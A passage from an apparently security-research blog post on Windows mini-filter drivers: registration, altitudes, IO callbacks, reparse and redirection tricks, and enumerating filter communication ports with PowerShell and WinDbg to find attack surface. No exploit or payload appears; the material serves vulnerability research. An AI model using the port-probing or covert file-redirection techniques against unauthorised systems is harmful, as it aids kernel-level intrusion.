As you can see the mini-filters don’t add their own device objects to the stack. Instead they are registered with the filter manager and it’s the filter manager which inserts its own device. The filter manager handles the IO requests and calls registered mini-filters to process the request. If your mini-filter doesn’t support a certain IO request then the filter manager implements a default which handles passing the IRP on to the next driver in the stack.

Another useful feature is the filter manager implements a mechanism for ordering the mini-filters, through an altitude value. The higher the altitude value, the higher the priority. For example, a filter at altitude 10000 will be called before a filter at altitude 5000 when making an IO request. When handling responses, the altitudes are processed in reverse order, so the filter at 5000 will be called first, then the one at 10000. Officially the altitude values must be registered with Microsoft. MSDN contains a list of the currently registered altitudes. However, there’s nothing to stop a driver from registering itself with a different altitude, except it’ll likely draw the ire of Microsoft and might fail certification. By formalizing the altitude values you avoid the risk that a filter driver’s ordering may change depending on load order.

Mini-Filter Registration

A mini-filter driver registers its presence by calling the FltRegisterFilter filter manager API, normally during the driver’s entry point. The main parameter is a FLT_REGISTRATION structure which defines all the various callbacks for handling IO requests and bookkeeping. The important fields are the callbacks which a driver can register to respond to events from the filter manager. You can view what filters are registered with the filter manager using the fltmc command line tool (must be run as an administrator).

C:\> fltmc

Filter Name                     Num Instances    Altitude    Frame
------------------------------  -------------  ------------  -----
bindflt                                 1       409800         0
WdFilter                               17       328010         0
storqosflt                              1       244000         0
wcifs                                   0       189900         0
CldFlt                                  0       180451         0
FileCrypt                               0       141100         0
luafv                                   1       135000         0
npsvctrig                               1        46000         0
Wof                                    14        40700         0
FileInfo                               17        40500         0

We can see all the mini-filters registered, the number of instances, which indicates how many volumes each filter has attached to, and the altitude. There are 19 volumes available for filtering on the system I tested (according to running fltmc volumes), so no filter is attached to everything. A driver can decide which volumes it wants to attach to by assigning an instance setup callback to the InstanceSetupCallback field in the filter registration structure. This callback is invoked for every volume on the system, including new ones added after the filter starts. The callback can return the status code STATUS_FLT_DO_NOT_ATTACH to block attachment.
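For example, a minimal instance setup callback with a hypothetical "local NTFS only" attachment policy might look like this (the policy is illustrative, not from any particular driver):

NTSTATUS
InstanceSetupCallback(PCFLT_RELATED_OBJECTS FltObjects,
                      FLT_INSTANCE_SETUP_FLAGS Flags,
                      DEVICE_TYPE VolumeDeviceType,
                      FLT_FILESYSTEM_TYPE VolumeFilesystemType) {
    // Hypothetical policy: only attach to disk-based NTFS volumes.
    if (VolumeDeviceType != FILE_DEVICE_DISK_FILE_SYSTEM ||
        VolumeFilesystemType != FLT_FSTYPE_NTFS) {
        return STATUS_FLT_DO_NOT_ATTACH;
    }
    return STATUS_SUCCESS;
}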

You can view what volumes a filter is attached to using fltmc again:

C:\> fltmc instances -f luafv

Instances for luafv filter:

Volume Name     Altitude        Instance Name       Frame  VlStatus
------------- ------------  ----------------------  -----  --------
C:               135000     luafv                     0

This just shows the volume that LUAFV is attached to. As UAC virtualization only makes sense in the context of the system drive, it’s only attached to C:. You can manually attach and detach filters on volumes using the fltmc tool with the attach and detach commands; we’ll show an example of using these commands later.

NOTE: Just because a filter driver is attached to a volume it doesn’t mean it’ll filter any IO requests for that volume. For example, the WOF driver is attached to all NTFS volumes, however it’ll only enable itself if there’s at least one file in the volume which is registered to be handled by WOF. Otherwise it ignores the IO request, letting it complete normally.

Most mini-filters only attach to file system volumes. However, the filter manager also supports attaching to the named pipe and mailslot devices. The filter driver indicates support by setting the FLTFL_REGISTRATION_SUPPORT_NPFS_MSFS flag in the FLT_REGISTRATION structure.
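Putting these registration pieces together, the following is a minimal sketch (not a complete driver) of what registration might look like. Callbacks is an operation list like the one shown in the next section, and FilterUnloadCallback and InstanceSetupCallback are placeholder names for routines the driver would define:

const FLT_REGISTRATION FilterRegistration = {
    sizeof(FLT_REGISTRATION),     // Size
    FLT_REGISTRATION_VERSION,     // Version
    0,                            // Flags
    NULL,                         // ContextRegistration
    Callbacks,                    // OperationRegistration
    FilterUnloadCallback,         // FilterUnloadCallback
    InstanceSetupCallback,        // InstanceSetupCallback
    // The remaining callback fields are left NULL.
};

PFLT_FILTER Filter;

NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {
    UNREFERENCED_PARAMETER(RegistryPath);
    NTSTATUS status = FltRegisterFilter(DriverObject, &FilterRegistration, &Filter);
    if (!NT_SUCCESS(status))
        return status;
    // No IO requests are delivered until the driver starts filtering.
    status = FltStartFiltering(Filter);
    if (!NT_SUCCESS(status))
        FltUnregisterFilter(Filter);
    return status;
}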

Mini-Filter IO Request Operation Callbacks

By far the most important field in the FLT_REGISTRATION structure is OperationRegistration which references a list of FLT_OPERATION_REGISTRATION structures defining the IO request callbacks. Each entry contains the IRP major code for the operation (such as IRP_MJ_CREATE or IRP_MJ_FILE_SYSTEM_CONTROL) and can have a pre-request and post-request callback. The driver doesn’t need to specify both callbacks if it only requires one. The list is a variable length array, terminated with the major code being set to IRP_MJ_OPERATION_END (0x80). Any operation not in the list is handled by the filter manager which typically just ignores it and continues to the next filter in the list. A basic example of what you might see in C code is shown below.

const FLT_OPERATION_REGISTRATION Callbacks[] = {
    { IRP_MJ_CREATE,
      0,
      PreCreateOperation,
      PostCreateOperation },
    { IRP_MJ_OPERATION_END }
};

A pre-request callback accepts three parameters:

  • The parameters for the operation, specified in a FLT_CALLBACK_DATA structure.
  • Related kernel objects, in a FLT_RELATED_OBJECTS structure.
  • An output pointer which can be assigned a callback context.

The prototype of the callback function pointer is:

typedef FLT_PREOP_CALLBACK_STATUS
(*PFLT_PRE_OPERATION_CALLBACK) (
    PFLT_CALLBACK_DATA Data,
    PCFLT_RELATED_OBJECTS FltObjects,
    PVOID *CompletionContext
    );

The parameters for the IO request are accessible in the FLT_CALLBACK_DATA structure’s Iopb field which is an FLT_IO_PARAMETER_BLOCK structure. The parameters are similar to the ones exposed through the IRP’s current IO_STACK_LOCATION structure. The data parameter also contains the IO_STATUS_BLOCK for the request and the caller’s requestor mode (either KernelMode or UserMode). The return code from the pre-request callback function determines what the filter driver wants to do with the request. The return type FLT_PREOP_CALLBACK_STATUS can be one of the following:

  • FLT_PREOP_SUCCESS_WITH_CALLBACK (0): The callback was successful. Pass on the IO request and get a post-operation callback after completion.
  • FLT_PREOP_SUCCESS_NO_CALLBACK (1): The callback was successful. Pass on the IO request. No callback required.
  • FLT_PREOP_PENDING (2): Mark the IO operation as pending.
  • FLT_PREOP_DISALLOW_FASTIO (3): If handling a Fast IO operation, fail it to force the operation as a normal IO request.
  • FLT_PREOP_COMPLETE (4): The operation has been completed. Do not pass on the IO request to any other drivers, even other filters in the stack.
  • FLT_PREOP_SYNCHRONIZE (5): Synchronize the post-operation callback in the same thread.
  • FLT_PREOP_DISALLOW_FSFILTER_IO (6): Disallow FastIO file creation.

A post-request callback accepts four parameters:

  • The parameters for the operation, specified in a FLT_CALLBACK_DATA structure.
  • Related kernel objects, in a FLT_RELATED_OBJECTS structure.
  • A context pointer which could have been assigned by the pre-operation callback.
  • Additional flags.

For post-operation callbacks the prototype is as follows:

typedef FLT_POSTOP_CALLBACK_STATUS
(*PFLT_POST_OPERATION_CALLBACK) (
    PFLT_CALLBACK_DATA Data,
    PCFLT_RELATED_OBJECTS FltObjects,
    PVOID CompletionContext,
    FLT_POST_OPERATION_FLAGS Flags
);

The parameters are more or less the same as for the pre-operation callback. The CompletionContext parameter is the same one assigned in the pre-operation callback. If this value was allocated the post-operation callback needs to free the memory buffer to prevent leaking memory. The FLT_POSTOP_CALLBACK_STATUS return type can be one of the following values.

  • FLT_POSTOP_FINISHED_PROCESSING (0): The callback was successful. No further processing required.
  • FLT_POSTOP_MORE_PROCESSING_REQUIRED (1): Halts completion of the IO request. The operation will be pending until the filter driver completes it.
  • FLT_POSTOP_DISALLOW_FSFILTER_IO (2): Disallow FastIO file creation.

Handling IO Requests

Now that we’ve described registration of the mini-filter and its callbacks, let's go through a few examples of how IO requests are handled inside the pre and post operation callbacks. We’ll use the six operations I mentioned earlier as a base for this discussion. Any examples are to demonstrate the likely code you’ll find in a driver but omit security checks and other unimportant details. This isn’t Stack Overflow, so please don’t copy and paste them into real drivers.

Pass the IO request unmodified

The simplest way of not modifying an IO request is to not specify a pre-operation callback. Of course we’re assuming the driver wants to handle an IO request selectively based on certain criteria so it must implement the callback.

The easiest way to ignore the IO request is to return the FLT_PREOP_SUCCESS_NO_CALLBACK status code from the pre-operation callback. That indicates to the filter manager that the mini-filter has completed its processing and is no longer interested in the IO request.

To give an example the following pre-create operation callback will ignore any open requests where the desired access does not request the FILE_WRITE_DATA access right. If the request doesn’t contain the access then the request is completed with no callback.

FLT_PREOP_CALLBACK_STATUS
PreCreateOperation(
    PFLT_CALLBACK_DATA Data,
    PCFLT_RELATED_OBJECTS FltObjects,
    PVOID* CompletionContext
) {
    PFLT_PARAMETERS ps = &Data->Iopb->Parameters;
    DWORD access = ps->Create.SecurityContext->DesiredAccess;
    if ((access & FILE_WRITE_DATA) == 0) {
        return FLT_PREOP_SUCCESS_NO_CALLBACK;
    }
    // Perform some operation...
    return FLT_PREOP_SUCCESS_WITH_CALLBACK;
}

The example extracts the desired access from the creation parameters. If the FILE_WRITE_DATA access right is not set then the filter driver will ignore the IO request entirely by returning the no callback status code.

Of course depending on the purpose of the filter driver it might still want the post-operation callback to be called. For example if the filter driver is monitoring file access then the post-operation callback will contain valuable information such as the success or failure of opening the file or the data read from the file. In this case it makes sense to return FLT_PREOP_SUCCESS_WITH_CALLBACK.

When the driver specifies it wants a post-operation callback, it can set the CompletionContext to any value it likes. This context is then passed to the post-operation callback and can be used to pass additional data between the callbacks so that each can perform its operation correctly.
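As an illustration, the following sketch allocates a context in the pre-operation callback and releases it in the post-operation callback. The MONITOR_CONTEXT structure, the callback names and the pool tag are made up for this example:

typedef struct _MONITOR_CONTEXT {
    ACCESS_MASK DesiredAccess;
} MONITOR_CONTEXT, *PMONITOR_CONTEXT;

FLT_PREOP_CALLBACK_STATUS
PreCreateMonitor(PFLT_CALLBACK_DATA Data,
                 PCFLT_RELATED_OBJECTS FltObjects,
                 PVOID* CompletionContext) {
    PMONITOR_CONTEXT ctx = ExAllocatePoolWithTag(
        NonPagedPoolNx, sizeof(MONITOR_CONTEXT), 'noMF');
    if (!ctx)
        return FLT_PREOP_SUCCESS_NO_CALLBACK;
    // Record something from the request for the post-operation callback.
    ctx->DesiredAccess =
        Data->Iopb->Parameters.Create.SecurityContext->DesiredAccess;
    *CompletionContext = ctx;
    return FLT_PREOP_SUCCESS_WITH_CALLBACK;
}

FLT_POSTOP_CALLBACK_STATUS
PostCreateMonitor(PFLT_CALLBACK_DATA Data,
                  PCFLT_RELATED_OBJECTS FltObjects,
                  PVOID CompletionContext,
                  FLT_POST_OPERATION_FLAGS Flags) {
    PMONITOR_CONTEXT ctx = CompletionContext;
    // Log ctx->DesiredAccess against Data->IoStatus.Status here, then
    // free the context to avoid leaking memory.
    ExFreePoolWithTag(ctx, 'noMF');
    return FLT_POSTOP_FINISHED_PROCESSING;
}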

Modify the IO request

During a pre-operation callback the driver can modify the contents of the FLT_CALLBACK_DATA structure. For example, the driver could change the security context used to open the file, or it could even change the name of the file itself. The driver must indicate to the filter manager that the data has been modified by setting the FLTFL_CALLBACK_DATA_DIRTY flag in the Flags field before returning. The correct way of setting the flag is to call the FltSetCallbackDataDirty API, although all that currently does is set the flag.
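For example, a pre-create callback could strip write access from a request; the policy here is made up purely to show the mechanics of modifying the parameters and marking the data dirty:

FLT_PREOP_CALLBACK_STATUS
PreCreateDowngrade(PFLT_CALLBACK_DATA Data,
                   PCFLT_RELATED_OBJECTS FltObjects,
                   PVOID* CompletionContext) {
    PIO_SECURITY_CONTEXT security =
        Data->Iopb->Parameters.Create.SecurityContext;
    // Hypothetical policy: downgrade write requests to read-only
    // before they reach the file system.
    if (security->DesiredAccess & FILE_WRITE_DATA) {
        security->DesiredAccess &= ~FILE_WRITE_DATA;
        FltSetCallbackDataDirty(Data);
    }
    return FLT_PREOP_SUCCESS_NO_CALLBACK;
}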

Modify the IO request response

As with the request, you can modify the response in the post-operation callback, which will return the changes to higher mini-filters and the IO manager. One trick I’ve commonly seen is to use this to change the target file by modifying the file name and returning the status code STATUS_REPARSE, as if the file system had encountered a symbolic link. The following is the basic approach that the LUAFV driver uses to perform the reparse operation to an arbitrary file path in a post-operation callback.

FLT_POSTOP_CALLBACK_STATUS LuafvReparse(PFLT_CALLBACK_DATA Data,
                                        PUNICODE_STRING TargetFileName) {
  LuafvSetEcp(Data, TargetFileName);
  PFILE_OBJECT FileObject = Data->Iopb->TargetFileObject;
  ExFreePool(FileObject->FileName.Buffer);
  FileObject->FileName.Buffer = ExAllocatePool(PagedPool,
                                        TargetFileName->Length);
  FileObject->FileName.MaximumLength = TargetFileName->Length;
  RtlCopyUnicodeString(&FileObject->FileName, TargetFileName);
  Data->IoStatus.Information = 0;
  Data->IoStatus.Status = STATUS_REPARSE;
  FltSetCallbackDataDirty(Data);
  return FLT_POSTOP_FINISHED_PROCESSING;
}

The code deallocates the filename buffer in the target file object and replaces it with its own. It then sets the status code to STATUS_REPARSE and indicates that processing has finished. In Windows 7, an IoReplaceFileObjectName API was introduced which makes this operation much less error prone; however, LUAFV was written for Vista, where the API didn’t exist, so it had to make do. An official Microsoft example can be found in the SimRep sample driver.

One quirk of this operation is that the FileName in the file object is volume relative, e.g. if you opened c:\windows\notepad.exe then FileName is set to \windows\notepad.exe. However, you can replace that with an absolute path such as \??\d:\abc.txt and it still works. Also the driver doesn’t need to create a real mount point or symbolic link reparse point buffer for this to work. The IO manager will just take the path from the file object and restart the create request with the new path.

Complete the IO request with a success result

The driver can immediately complete an IO request by returning FLT_PREOP_COMPLETE from a pre-operation callback and updating the IO_STATUS_BLOCK in the FLT_CALLBACK_DATA parameter. The previous reparse example shows how that update works. If you’re only updating the IO_STATUS_BLOCK you don’t need to mark the data as dirty.

Higher level filter drivers will still get their post-operation callbacks invoked if they’re registered for them, however no lower altitude drivers will be called with the IO request.
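As a minimal sketch, a pre-read callback that reports a successful zero-byte read without ever forwarding the request might look like the following (a made-up example, not from a real driver):

FLT_PREOP_CALLBACK_STATUS
PreReadComplete(PFLT_CALLBACK_DATA Data,
                PCFLT_RELATED_OBJECTS FltObjects,
                PVOID* CompletionContext) {
    // Report success with zero bytes transferred. The request never
    // reaches lower filters or the file system.
    Data->IoStatus.Status = STATUS_SUCCESS;
    Data->IoStatus.Information = 0;
    return FLT_PREOP_COMPLETE;
}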

Complete the IO request with an error result

This is basically the same as for a success code, just specifying a different NT status. There’s nothing stopping a higher level filter driver from ignoring the error code and replacing it with a success.

Pass the IO request to a different file or device stack

The filter driver can redirect the operation to another device stack. For example you could implement a driver which redirects file reads and writes to a completely different file on the disk, making it look like the user is modifying the file when they’re not.

The most obvious way of achieving this would be to open the new file during the pre-create operation then use that file object as the target for all subsequent operations. There are two potential issues with this approach.

First, how can a filter driver interact with a file system volume it’s attached to without resulting in an infinite loop? For example, if the driver wants to open a file it can call IoCreateFile (and variants). However, the IO manager would dispatch the IO request to the top of the device stack, which would get back to the filter manager which could end up calling the filter driver again, ad infinitum. The same would be the case with any exported APIs from the kernel.

This issue is solved through two mechanisms. The first is that the filter manager exposes a set of APIs which mirror the kernel IO APIs but only dispatch the IO request to filters below the caller. For example you can call FltCreateFileEx or FltWriteFile and be sure you won’t end up in a loop.

For file creation requests the driver can also employ a second mechanism called Extra Create Parameters (ECP). An ECP is a GUID along with additional data which can be attached to the create request using the FltInsertExtraCreateParameter API. The filter driver can attach the ECP to the request, then check for its presence using the FltFindExtraCreateParameter API, allowing it to ignore the request. For example, the earlier code showing how LUAFV implements a reparse operation calls LuafvSetEcp, which sets an ECP on the request so that the resulting create request can be ignored by the driver.
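The following sketch shows the checking side of this pattern. The GUID value and the helper name are invented for the example, and error handling is elided:

static const GUID MY_ECP_GUID =
    { 0x11111111, 0x2222, 0x3333,
      { 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44 } };

// Returns TRUE if the create request carries our ECP, i.e. it was
// issued by our own FltCreateFileEx call and should be ignored.
BOOLEAN IsOwnCreateRequest(PFLT_FILTER Filter, PFLT_CALLBACK_DATA Data) {
    PECP_LIST EcpList;
    PVOID EcpContext;
    if (NT_SUCCESS(FltGetEcpListFromCallbackData(Filter, Data, &EcpList)) &&
        EcpList != NULL &&
        NT_SUCCESS(FltFindExtraCreateParameter(Filter, EcpList, &MY_ECP_GUID,
                                               &EcpContext, NULL))) {
        return TRUE;
    }
    return FALSE;
}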

The second issue is how do you actually pass on the parameters for the IO request to the new file you’ve opened? The naive approach would be to extract the parameters then invoke the corresponding filter manager API. For example, for a write IO request, read out the buffer and length then call FltWriteFile. This is error prone and might introduce subtle security issues.

A better approach is the driver can change the TargetFileObject field in the pre-operation callback’s FLT_IO_PARAMETER_BLOCK structure then return a success code for the IO request to continue. This will cause the filter manager to send the original IO request to the new file object. The following is a simple example which could be in a pre-operation callback which will redirect the request to a file object extracted from the file system context:

PREDIRECT_CONTEXT context = // Get driver’s allocated context.
if (context->FileObject) {
    Data->Iopb->TargetFileObject = context->FileObject;
    FltSetCallbackDataDirty(Data);
    return FLT_PREOP_SUCCESS_NO_CALLBACK;
}

Mini-Filter Communication

For there to be a security vulnerability the driver must process some untrustworthy data from a malicious user. What makes mini-filter drivers interesting is that there are multiple places where untrusted data can be processed. Let’s go through the ways of identifying and analyzing these communication channels.

Device Object

A mini-filter doesn’t need to create any device object to perform its function; the filter manager deals with creating any necessary device objects. That doesn’t mean the driver can’t create one for its own purposes. A typical attack vector is that a malicious user opens a handle to the device object and sends device IO control codes to exercise the vulnerable behavior.

I’m not going to go into details about how to analyze Windows kernel drivers for security issues in the IRP dispatch callbacks, as there’s plenty of other resources. For example: Reverse Engineering and Bug Hunting on KMDF Drivers (video, slides).

Filter Communication Ports

One unique communication mechanism which is implemented by the filter manager is Filter Communication Ports. A port can be created by a mini-filter driver by calling the exported filter manager API FltCreateCommunicationPort.

PSECURITY_DESCRIPTOR SecurityDescriptor;
FltBuildDefaultSecurityDescriptor(
  &SecurityDescriptor,
  FLT_PORT_ALL_ACCESS
);
UNICODE_STRING Name;
RtlInitUnicodeString(&Name, L"\\FilterPortName");
OBJECT_ATTRIBUTES ObjAttr;
InitializeObjectAttributes(&ObjAttr, &Name, 0, NULL, SecurityDescriptor);
PFLT_PORT Port;
FltCreateCommunicationPort(
  Filter,
  &Port,
  &ObjAttr,
  NULL,
  ConnectNotifyCallback,
  DisconnectNotifyCallback,
  MessageNotifyCallback,
  100
);

The name of the port is specified using an OBJECT_ATTRIBUTES structure, in this example the filter port will be called \FilterPortName in the Object Manager Namespace (OMNS). The driver should also specify the security descriptor to be associated with the port through the OBJECT_ATTRIBUTES. It’s most common to call the FltBuildDefaultSecurityDescriptor API to build a security descriptor which only grants administrators access to the port. However, the driver can configure the security any way it likes.

In FltCreateCommunicationPort the filter manager creates a new named kernel object of type FilterConnectionPort with the OBJECT_ATTRIBUTES and associates it with the callbacks. There’s no NtOpenFilterConnectionPort system call to open a port. Instead, when a user wants to access the port, they must first open a handle to the filter manager message device object, \FileSystem\Filters\FltMgrMsg, passing an extended attributes structure identifying the full OMNS path to the port.

It is much easier to open a port by calling the FilterConnectCommunicationPort API in user-mode, so you don’t need to deal with connecting manually. When opening a port you can also specify an arbitrary context buffer to pass to the connect callback. This can be used to configure the open port instance. On connection the connect notification callback passed to FltCreateCommunicationPort will be called. The prototype for the callback is as follows:

typedef NTSTATUS
(*PFLT_CONNECT_NOTIFY) (
      PFLT_PORT ClientPort,
      PVOID ServerPortCookie,
      PVOID ConnectionContext,
      ULONG SizeOfContext,
      PVOID *ConnectionPortCookie
      );

The ConnectionContext and SizeOfContext are values passed from user-mode when calling FilterConnectCommunicationPort. The ConnectionContext has its length verified and copied into kernel memory before use. However, there’s no structure for the context so the driver must still carefully verify its contents before using it. The driver can reject a caller by returning an error NT status code. This allows the driver to do things like verify the caller is in a signed binary or similar, which is likely something security products will do.

If the connection is allowed the ConnectionPortCookie pointer can be updated with a pointer to an allocated structure unique to the client. This pointer will be passed back to the driver in the message and disconnect notification callbacks.
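From user mode, a minimal client might look like the following sketch; the port name and the message format are placeholders which would have to match whatever the target driver expects:

#include <windows.h>
#include <fltuser.h>
#include <stdio.h>

#pragma comment(lib, "fltlib.lib")

int main() {
    // Placeholder context buffer; the layout must match what the
    // driver's connect notification callback expects.
    BYTE Context[4] = { 0, 1, 2, 3 };
    HANDLE Port;
    HRESULT hr = FilterConnectCommunicationPort(
        L"\\MyFilterPort", 0, Context, (WORD)sizeof(Context), NULL, &Port);
    if (FAILED(hr)) {
        printf("Connect failed: %08x\n", (unsigned)hr);
        return 1;
    }
    // Send a message to the driver's message notification callback
    // and read back the reply.
    BYTE Reply[0x100];
    DWORD BytesReturned;
    hr = FilterSendMessage(Port, Context, sizeof(Context), Reply,
                           sizeof(Reply), &BytesReturned);
    printf("FilterSendMessage: %08x (%lu bytes)\n", (unsigned)hr, BytesReturned);
    CloseHandle(Port);
    return 0;
}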

You can enumerate what ports are currently registered by inspecting the OMNS. For example, to enumerate the ports in the root of the OMNS using my NtObjectManager PowerShell module run the following command:

PS> ls NtObject:\ | Where-Object TypeName -eq "FilterConnectionPort"

Name                                      TypeName
----                                      --------
storqosfltport                            FilterConnectionPort
MicrosoftMalwareProtectionRemoteIoPortWD  FilterConnectionPort
MicrosoftMalwareProtectionVeryLowIoPortWD FilterConnectionPort
WcifsPort                                 FilterConnectionPort
MicrosoftMalwareProtectionControlPortWD   FilterConnectionPort
BindFltPort                               FilterConnectionPort
MicrosoftMalwareProtectionAsyncPortWD     FilterConnectionPort
CLDMSGPORT                                FilterConnectionPort
MicrosoftMalwareProtectionPortWD          FilterConnectionPort

You might notice there is also a FilterCommunicationPort kernel object type. This is the object used for the client-end where FilterConnectionPort is the mini-filter server end. You should never see a FilterCommunicationPort named object in the OMNS.

When the port is opened the kernel will check the security descriptor for access. Unfortunately there’s no way to directly query the assigned security descriptor for a port from user-mode. The simplest way to test is to just try and open the port and see if it returns an access denied error.

PS> $ports = ls NtObject:\ |
Where-Object TypeName -eq "FilterConnectionPort"
PS> foreach($port in $ports.Name) {
    Write-Host "\$port"
    Use-NtObject($p = Get-FilterConnectionPort "\$port") {}
}
\BindFltPort
Exception: "(0x80070005) - Access is denied."
\CLDMSGPORT
Exception: "(0x8007017C) - The cloud operation is invalid."

We can see two ports output in the previous code snippet. The BindFltPort port fails with an access denied error, while the CLDMSGPORT port (which is part of the Cloud Filter driver) returns “The cloud operation is invalid”. The second error indicates that we’ve likely opened the port, but you’ll need to supply specific parameters in the context buffer when calling the FilterConnectCommunicationPort API. You can supply the connection context to the Get-FilterConnectionPort command by passing a byte array to the Context parameter.

PS> $port = Get-FilterConnectionPort -Path "\PORT" -Context @(0, 1, 2, 3)

You can inspect the security descriptor for a port if you’ve got a Windows system with a kernel debugger enabled and a copy of WinDBG.

0: kd> !object \CLDMSGPORT
Object: ffffb487447ff8c0  Type: (ffffb4873d67dc40) FilterConnectionPort
    ObjectHeader: ffffb487447ff890 (new version)
    HandleCount: 1  PointerCount: 4
    Directory Object: ffff8a8889a2d4e0  Name: CLDMSGPORT